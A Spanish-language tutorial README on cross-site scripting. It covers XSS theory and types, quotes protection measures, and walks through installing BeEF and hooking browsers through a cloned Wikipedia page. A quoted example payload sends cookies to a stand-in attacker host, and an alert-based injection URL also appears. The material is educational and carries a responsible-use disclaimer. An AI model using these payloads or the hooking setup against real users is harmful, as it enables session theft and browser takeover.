<p align="center">
  <img src="images/Howtoxss.png">
</p>

# Indice de contenido

1. [XSS cross sites scripting](#xss)

    + [Teoría](#teoria) 
    + [Tipos de ataques xss](#ataques)
        * [Non-persistent (reflected)](#reflected)
        * [Persistent](#persistent)
        * [Server-side versus DOM-based vulnerabilities](#DOM)
        * [Self-XSS](#self)
    + [Medidas de protección](#protect)

2. [XSS con Browser Explotation Framework BeEF](#beef)

    + [Introducción de la herramienta](#intro)
    + [Instalación](#install)
    + [Set-up](#setup)
    + [Comandos](#command)


## XSS cross-site scripting <a name="xss"></a> 
<br/>
El xss o cross-site scripting es una vulnerabilidad encontrada frecuentemente en webs i aplicaciones que aceptan input por parte de los usuarios, ya sean cajas de comentarios, formularios o mensajes.

En resumen, este ataque utiliza la inyección de código en paginas web para ejecutar scripts o comandos y así poder ganar acceso o poder obtener datos de los clientes. Es peligroso ya que bien ejecutado pasa desapercibido completamente y el usuario puede estar siendo victima sin darse cuenta, ya que los scripts se ejecutan en background.

Actualmente es una de las vulnerabilidades más frecuentes en el entorno web y es muy complejo poder asegurarse del todo contra esta misma ya que dispone de multiples variantes y cualquier mínimo fallo puede resultar en una vulnerabilidad grande.



## Teoría  <a name="teoria"></a>  
<br/>
* Información extraída de [Wikipedia](https://en.wikipedia.org/wiki/Cross-site_scripting)  
  
>Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007
>
>Here’s an example:
>
><'script> i=new/**/Image();isrc=http://evilwebsite.com/log.php?'+document.cookie+' '+document.location</'script>
>
>While the payload is usually JavaScript, XSS can take place using any client-side language.
>
>To carry out a cross site scripting attack, an attacker injects a malicious script into user-provided input. Attackers can also carry out an attack by modifying a request. If the web app is vulnerable to XSS attacks, the user-supplied input executes as code. For example, in the request below, the script displays a message box with the text “xss.”
>
>http://www.site.com/page.php?var=<'script>alert('xss');</'script>
>
>There are many ways to trigger an XSS attack. For example, the execution could be triggered automatically when the page loads or when a user hovers over specific elements of the page (e.g., hyperlinks).
>
>Potential consequences of cross site scripting attacks include these:
>
>Capturing the keystrokes of a user.
>Redirecting a user to a malicious website.
>Running web browser-based exploits (e.g., crashing the browser).
>Obtaining the cookie information of a user who is logged into a website (thus compromising the victim’s account).
>In some cases, the XSS attack leads to a complete compromise of the victim’s account. Attackers can trick users into entering credentials on a fake form, which provides all the information to the attacker.
>

## Tipos de ataques <a name="ataques"></a>

Existen diversos tipos de vectores de ataque dentro del XSS

* Información extraida de [Wikipedia](https://en.wikipedia.org/wiki/Cross-site_scripting)

>
>### Non-persistent (reflected) <a name="reflected"></a>
>Example of a non-persistent XSS flaw
>Non-persistent XSS vulnerabilities in Google could allow malicious sites to attack Google users who visit them while logged in.[9]
>
>The non-persistent (or reflected) cross-site scripting vulnerability is by far the most basic type of web vulnerability.[10] These holes show up when the data provided by a web client,[11] most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content.[12]
>
>Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection.[10][12] A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue.[13]
>
>A reflected attack is typically delivered via email or a neutral web site. The bait is an innocent-looking URL, pointing to a trusted site but containing the XSS vector. If the trusted site is vulnerable to the vector, clicking the link can cause the victim's browser to execute the injected script.
>
>### Persistent (or stored)  <a name="persistent"></a>
>Example of a persistent XSS flaw
>A persistent cross-zone scripting vulnerability coupled with a computer worm allowed execution of arbitrary code and listing of filesystem contents via a QuickTime movie on MySpace.[14]
>
>The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.[12]
>
>For example, suppose there is a dating website where members scan the profiles of other members to see if they look interesting. For privacy reasons, this site hides everybody's real name and email. These are kept secret on the server. The only time a member's real name and email are in the browser is when the member is signed in, and they can't see anyone else's.
>
>Suppose that Mallory, an attacker, joins the site and wants to figure out the real names of the people she sees on the site. To do so, she writes a script designed to run from other users' browsers when they visit her profile. The script then sends a quick message to her own server, which collects this information.
>
>To do this, for the question "Describe your Ideal First Date", Mallory gives a short answer (to appear normal) but the text at the end of her answer is her script to steal names and emails. If the script is enclosed inside a <"script"> element, it won't be shown on the screen. Then suppose that Bob, a member of the dating site, reaches Mallory's profile, which has her answer to the First Date question. Her script is run automatically by the browser and steals a copy of Bob's real name and email directly from his own machine.
>
>Persistent XSS vulnerabilities can be more significant than other types because an attacker's malicious script is rendered automatically, without the need to individually target victims or lure them to a third-party website. Particularly in the case of social networking sites, the code would be further designed to self-propagate across accounts, creating a type of client-side worm.[15]
>
>The methods of injection can vary a great deal; in some cases, the attacker may not even need to directly interact with the web functionality itself to exploit such a hole. Any data received by the web application (via email, system logs, IM etc.) that can be controlled by an attacker could become an injection vector.
>
>### Server-side versus DOM-based vulnerabilities  <a name="DOM"></a>
>Example of a DOM-based XSS flaw
>Before the bug was resolved, Bugzilla error pages were open to DOM-based XSS attacks in which arbitrary HTML and scripts could be injected using forced error messages.[16]
>
>XSS vulnerabilities were originally found in applications that performed all data processing on the server side. User input (including an XSS vector) would be sent to the server, and then sent back to the user as a web page. The need for an improved user experience resulted in popularity of applications that had a majority of the presentation logic (maybe written in JavaScript) working on the client-side that pulled data, on-demand, from the server using AJAX.
>
>As the JavaScript code was also processing user input and rendering it in the web page content, a new sub-class of reflected XSS attacks started to appear that was called DOM-based cross-site scripting. In a DOM-based XSS attack, the malicious data does not touch the web server. Rather, it is being reflected by the JavaScript code, fully on the client side.
>
>An example of a DOM-based XSS vulnerability is the bug found in 2011 in a number of jQuery plugins.[18] Prevention strategies for DOM-based XSS attacks include very similar measures to traditional XSS prevention strategies but implemented in JavaScript code and contained in web pages (i.e. input validation and escaping).[19] Some JavaScript frameworks have built-in countermeasures against this and other types of attack — for example AngularJS.[20]
>
>### Self-XSS  <a name="self"></a>
>Self-XSS is a form of XSS vulnerability that relies on social engineering in order to trick the victim into executing malicious JavaScript code in their browser. Although it is technically not a true XSS vulnerability due to the fact it relies on socially engineering a user into executing code rather than a flaw in the affected website allowing an attacker to do so, it still poses the same risks as a regular XSS vulnerability if properly executed.[21]
>
>* Mutated XSS (mXSS)
>Mutated XSS happens when the attacker injects something that is seemingly safe but is rewritten and modified by the browser while parsing the markup. This makes it extremely hard to detect or sanitize within the website's application logic. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters on parameters to CSS font-family.
>

## Medidas de protección <a name="protect"></a>

Es complicado estar completamente protegido de un posible ataque de XSS ya que los atacantes tienen muchas posibilidades para ejecutarlo y la más minima vulnerabilidad puede ser usada.
A continuación hay un listado de posibles maneras de protegerse del XSS extraido de [portswigger](https://portswigger.net/web-security/cross-site-scripting)


>Preventing cross-site scripting is trivial in some cases but can be much harder depending on the complexity of the application and the ways it handles user-controllable data.
>
>In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:
>
>1. Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input.
>2. Encode data on output. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.
>3. Use appropriate response headers. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.
>4. Content Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.


## XSS con Browser Explotation Framework BeEF <a name="beef"></a>

## Introducción de la herramienta <a name="intro"></a>

En este apartado os explicaremos sobre algo que hoy en día es muy peligroso y hay que tener en cuenta a la hora de navegar por internet y visitar links de dudosa procedencia. Actualmente la digitalización del mundo ha hecho que gran parte de lo que hacemos en el ordenador sea mediante el browser, ya no se usan tanto las aplicaciones de escritorio, si no que se utilizan las versiones web de los programas. Esto implica que mucha de nuestra información este expuesta a un posible ataque, ya bien sean nuestras contraseñas para acceder a sitios web que mucha gente guarda en las cuentas de google (cosa que no debería hacer nadie ya que si alguien gana acceso a esa cuenta de Google automáticamente tendría el listado de todas las otras contraseñas) o nuestros datos personales que se pueden guardar tanto el el caché como en las cookies de los sitios web que visitamos.

¿A que viene toda esta explicación? pues bien, como hemos dicho el browser es algo importante y que desafortunadamente es bastante vulnerable. En este apartado os hablaremos de la herramienta BeEF, un framework enfocado al pentesting que nos permite obtener control del browser de la victima.

## Instalación <a name="install"></a>

![ej](images/beeflogo.jpeg "ej")

* Disclaimer:
Esta es una herramienta que nos permite una gran gamma de ataques enfocados al browser, asi que si después de leer esta pequeña explicación de como usar BeEF quieres implementarlo, pedimos discreción y un uso responsable, lo que significa no usarlo en nadie que no lo autorice.

Ahora si, lo primer que hace falta es instalar BeEF en nuestro equipo. Cabe resaltar que por compatibilidad la mejor opción es montarlo en una distribución de Kali Linux, ya que en otras distribuciones podría dar error.
En nuestro caso usaremos un servicio en la nube donde haremos un deployment de un servidor web con BeEF, esto para facilitar el acceso y la configuración.

* Instalar BeEF

```sh
sudo apt install beef-xss

cat /root/beef.info
```

Una vez tengamos BeEF instalado hay que crear un usuario para acceder e inicializarlo, esta parte se puede omitir y usar el login por defecto. Una vez listo se nos dará una dirección para acceder al panel de control.

Este es el link que se nos da para poder acceder al panel de control

![ej](images/beefcontrollink.png "ej")

Y la siguiente imagen es el login para poder acceder al panel.


![ej](images/beefcontrolpanel.png "ej")

## Set-up <a name="setup"></a>


Una vez hecho esto podremos acceder a la consola de BeEF, en esta podremos ver los dispositivos sobre los que tenemos control y podremos administrar que tipo de ataque queremos realizar. Para poder tener acceso a un navegador tenemos varias opciones. En primer lugar enviar a la victima la pagina por defecto de BeEF que contiene un archivo js que permite hookear el browser, en segundo lugar, crear nosotros una página web y añadirle un script js para injertar el código que nos permitirá ganar acceso a al browser, que es lo que utilizaremos en esta ocasión. 
En esta demostración copiaremos la Wikipedia de Alpaca e introduciremos el script en el código de la página. (interceptarlo y administrarlo)

Este es el menu inicial, podemos ver como a la izquierda tenemos los dispositivos que están conectados y también lo que no lo están pero los cuales han estado conectados en algún momento.

![ej](images/beefmenuini.png "ej")

Este es el menu inicial, podemos ver como a la izquierda tenemos los dispositivos que están conectados y también lo que no lo están pero los cuales han estado conectados en algún momento. También podemos observar que hay 2 links, ambos son templates que podemos usar como ejemplo para ejecutar el ataque.  

Este es uno de los templates de BeEF para ganar acceso a otros dispositivos. Cabe mencionar que podremos atacar a la víctima siempre y cuando se mantenga en la página.


![ej](images/beefdefault.png "ej")

En nuestro caso, como hemos mencionado antes, hemos clonado la página de Wikipedia sobre las alpacas y hemos encendido un servicio web. Se ve perfectamente que no es  el original, pero eso es lo que queremos para poder identificarlo y saber cuando no estamos en un lugar seguro.

Aquí tenemos el resultado de la página:

![ej](images/beefalpaca.png "ej")

Pero para que esto funcione, necesitamos que se ejecute un script dentro de la página que nos habilite el acceso con BeEF. En este ejemplo nosotros mismos introduciremos el script en el código de la página, pero en un escenario real, un atacante podría introducir este script gracias a una vulnerabilidad xss y este se ejecutaría dándonos acceso al browser.

Este es el script que hay que añadir en el código de la web.

![ej](images/beefjs.png "ej")



## Comandos <a name="command"></a>

Ahora llega el momento de trastear con BeEF y las multiples aplicaciones que tiene.

En primer lugar podemos observar que una vez tengamos una victima podemos acceder a un panel con al información que BeEF recopila por defecto, como el tipo de dispositivo, la ip pública de este y el sistema operativo junto a otros como el tipo de navegador que utiliza y las extensiones que tiene instaladas.

![ej](images/beefdetail.png "ej") 


Una vez hayamos visto los detalles que no proporciona BeEF, podemos dirigirnos a la pestaña de Commands y ver la gran variedad de opciones que trae.


![ej](images/beefcommands.png "ej") 

Podemos observar que tiene un número inmenso de comandos con los que interactuar y poder practicar. 


